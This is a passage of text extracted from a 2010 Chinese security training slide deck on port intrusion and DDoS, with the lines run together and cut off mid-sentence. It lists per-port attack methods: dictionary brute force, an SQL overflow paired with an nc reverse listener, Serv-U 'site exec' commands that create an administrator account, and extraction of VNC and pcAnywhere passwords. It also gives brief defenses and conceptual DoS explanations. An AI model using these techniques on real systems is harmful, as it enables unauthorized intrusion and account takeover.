端口入侵&攻击

北京安氏领信科技发展有限公司LinkTrustTechnologiesDevelopmentCo,.LtdWEB应用安全-端口入侵&攻击宋克亚高级安全技术顾问©2010北京安氏领信科技发展有限公司2目录端口讲解-端口的含义和作用一二安全防范三端口漏洞利用讲解基于端口攻击的“DDOS”讲解四©2010北京安氏领信科技发展有限公司3端口的含义与作用操作系统的端口：是指你一个软件如果要进行通信必须需要操作系统给一个端口才可以正常通讯。PC或者服务器之间用IP通讯。（专有核心网除外）软件：端口一般都是软件定义的不同的软件有着不同的端口你可以通过防火墙来设置端口的开关。程序间通讯要用端口。每一个网络通讯都会占用一个端口，共1-65535个端口。©2010北京安氏领信科技发展有限公司4查看开放端口信息工具或者命令命令：netstat–na重定向举例：netstat–nac:\1.txt©2010北京安氏领信科技发展有限公司5查看本机开放端口信息活动的链接：协议本地地址来源地址目标监听状态CLOSE_WAIT等待关闭©2010北京安氏领信科技发展有限公司6查看本机开放端口信息©2010北京安氏领信科技发展有限公司7工具介绍：“aio”命令举例：aio-mport查看端口工具©2010北京安氏领信科技发展有限公司8常见端口的入侵©2010北京安氏领信科技发展有限公司9“1433”端口入侵工具scanport.exe查有1433的机器SQLScanPass.exe进行字典暴破（字典是关键）最后SQLTools.exe入侵对sql的sp2及以下的系统，可用sql的hello溢出漏洞入侵。nc-vv-l-p本机端口sqlhelloF.exe入侵ip1433本机ip本机端口（以上反向的）sqlhelloz.exe入侵ip1433（这个是正向连接）©2010北京安氏领信科技发展有限公司10“1433”端口入侵工具sqlhello溢出（首先利用“NC”工具）nc-vv-l-p500监听一个端口作用：反弹端口©2010北京安氏领信科技发展有限公司11“4899”端口入侵工具4899：影子远程管理软件©2010北京安氏领信科技发展有限公司12“4899”端口入侵1、利用工具：扫描空口令（管理员的安全意识不高）2、利用脚本漏洞：拿到“WEBSHELL”读取注册表的“radmin”密码信息读取的密码是“MD5”加密的©2010北京安氏领信科技发展有限公司133389的入侵（2002年很容易），目前不太现实，微软等软件厂商的安全意识在不断增强。“3389”端口入侵对很早的机器，可以试试3389的溢出。(win3389ex.exe)对2003的机器，可以试试字典暴破。(tscrack.exe)输入法漏洞。过渡到“80端口入侵---提权增加3389的链接账户”。©2010北京安氏领信科技发展有限公司14“80”端口入侵WEB脚本入侵（通过脚本漏洞来实现）例举：对sp3以前的机器，可以用webdav入侵；对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe）可以利用SQL进行注入。（啊D的注入软件）©2010北京安氏领信科技发展有限公司15“80”端口入侵WEB脚本入侵漏洞总结：crosssitescripting跨站点脚本sourcecodedisclosure源代码公开sqlinjectionSQL注入directorieswithexecutepermissionenabled目录的执行权限启用CGIandscripting-relateddirectoriesCGI脚本漏洞Apacheexpectheadercross-sitescriptingvulnerabilityApache请求头部跨站漏洞UNIX-RelateddirectoriesUNIX相关目录暴露Redirectunauthenticatedandtransmission重定向未验证和传输Directorytraversal目录遍历©2010北京安氏领信科技发展有限公司16“21”端口入侵对5.004及以下系统，可用溢出入侵。（serv5004.exe）对5.1.0.0及以下系统，可用本地提升权限。（servlocal.exe）对serv-u的MD5加密密码，可以用字典暴破。（crack.vbs）输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码quotesiteexenetuser11/addquotesiteexecnetlocalgroupadministrators1/add或者破解ftp密码上传webshell进一步提权防御：设置复杂密码,设置servu本地管理密码或更换其它的ftp服务器软件，升级FTP软件到最新版本。©2010北京安氏领信科技发展有限公司17“5631”端口入侵5631端口（赛门铁克公司）：pcanywhere远程控制管理拿到webshell找到*.cif文件破解管理密码系统盘的DocumentsandSettings/AllUsers/ApplicationData/Symantec/pcAnywhere/*.cif防御：设置*.cif文件路径的访问权限©2010北京安氏领信科技发展有限公司18“135”端口入侵NTscan扫描出密码，然后用Recton中马。©2010北京安氏领信科技发展有限公司19“5900”端口入侵5900端口：vnc远程控制软件1、溢出漏洞,直接用利用工具连接不用密码2、拿到webshell读取注册表的password破解,登录以下是两种VNC路径：1:RealVNC的路径:HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\PasswordD751CC7331247A93127CEFFA6E0B7AD9x4.exe-W大写的Wvncpwdump.exe-s破解本机的VNC密码vncpwdump.exe-k得到的key进行破解2:UltraVNC的路径:HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default\password设置注册表的访问权限©2010北京安氏领信科技发展有限公司20“3306”端口入侵3306端口：mysql数据库hscan扫描出3306的密码进行反弹提权防御：设置root帐户不能远程连接,或设置防火墙禁止外网连接©2010北京安氏领信科技发展有限公司21“53”端口入侵53端口：主要是dns溢出©2010北京安氏领信科技发展有限公司22DDOS模拟攻击器讲解©2010北京安氏领信科技发展有限公司23DDOS讲解国内外研究的现状DOS问题的起因DoS攻击原理DoS防御方法DDoS研究的意义©2010北京安氏领信科技发展有限公司24研究现状国内：1）DHS,NFS在2004年资助几个大学和公司启动了DETER（DefenseTechnologyExperimentalResearch）。这个项目的一个研究重点就是防御DDoS攻击。2）信息产业部在2005年公开向产业界招标防御DDoS攻击系统的设计方案©2010北京安氏领信科技发展有限公司25DOS问题的起因面向目的地址进行路由Internet的无状态性Internet缺乏身份鉴别机制Internet协议的可预测性（例如，TCP连接建立过程和拥塞控制）©2010北京安氏领信科技发展有限公司26PingofDeath本来在正常的情况下，TCP/IP的RFC文档中对包的最大尺寸都有严格限制规定，许多操作系统的TCP/IP协议栈都规定ICMP包大小为64KB，且在对包的标题头进行读取之后，要根据该标题头里包含的信息来为有效载荷生成缓冲区。但是“PingofDeath”故意产生畸形的测试Ping包，加载的尺寸超过64KB的上限，使未采取保护措施的网络系统出现内存分配错误，导致TCP/IP协议栈崩溃，最终达到目标拒绝服务的目的。©2010北京安氏领信科技发展有限公司27Teardrop:泪滴攻击IP数据包在网络传递时，数据包可以分成更小的片段。攻击者可以通过发送两段（或者更多）数据包来实现TearDrop攻击。第一个包的偏移量为0，长度为N，第二个包的偏移量小于N。为了合并这些数据段，TCP/IP堆栈会分配超乎寻常的巨大资源，从而造成系统资源的缺乏甚至机器的重新启动，达到攻击者需要的拒绝服务目的。©2010北京安氏领信科技发展有限公司28UDPflood：UDP洪水UDPflood最开始一般应用在针对UNIX类的服务器上，攻击者通过伪造与某一主机的Chargen服务之间的一次的UDP连接，回复地址指向开着Echo服务的一台主机，通过将Chargen和Echo服务互指，来回传送毫无用处且占满带宽的垃圾数据，在两台主机之间生成足够多的无用数据流，这一拒绝服务攻击飞快地导致网络可用带宽耗尽。©2010北京安氏领信科技发展有限公司29SYNflood正常TCP三次握手©2010北京安氏领信科技发展有限公司30当服务方收到请求方的SYN-ACK确认消息后，请求方由于采用源地址欺骗等手段使得服务方收不到ACK回应，于是服务方会在一定时间处于等待接收请求方ACK消息的状态。而对于某台服务器来说，可用的TCP连接是有限的，因为他们只有有限的内存缓冲区用于创建连接，如果这一缓冲区充满了虚假连接的初始信息，该服务器就会对接